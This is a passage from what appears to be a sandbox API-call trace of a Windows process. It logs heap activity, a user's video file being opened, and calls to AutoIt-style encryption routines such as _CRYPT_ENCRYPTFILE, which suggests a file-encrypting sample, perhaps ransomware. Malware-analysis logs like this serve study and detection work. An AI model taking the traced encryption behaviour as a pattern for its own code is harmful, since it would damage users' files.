[0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.718] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0102.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0102.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.718] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0102.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0102.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0102.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0102.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\yxs3r3.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a77b8 [0102.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0102.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.721] FreeLibrary (hLibModule=0x772d0000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0102.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.722] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.723] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.723] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a77b8 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0102.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0102.725] CloseHandle (hObject=0x298) returned 1 [0102.725] FreeLibrary (hLibModule=0x772d0000) returned 1 [0102.725] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0102.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\yxs3r3.mp4", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2281a0f0, ftCreationTime.dwHighDateTime=0x1d5e63a, ftLastAccessTime.dwLowDateTime=0x46c92e10, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x46c92e10, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0xc29d, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="yxs3r3.mp4", cAlternateFileName="")) returned 0x41ac500 [0102.725] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0102.725] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0102.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 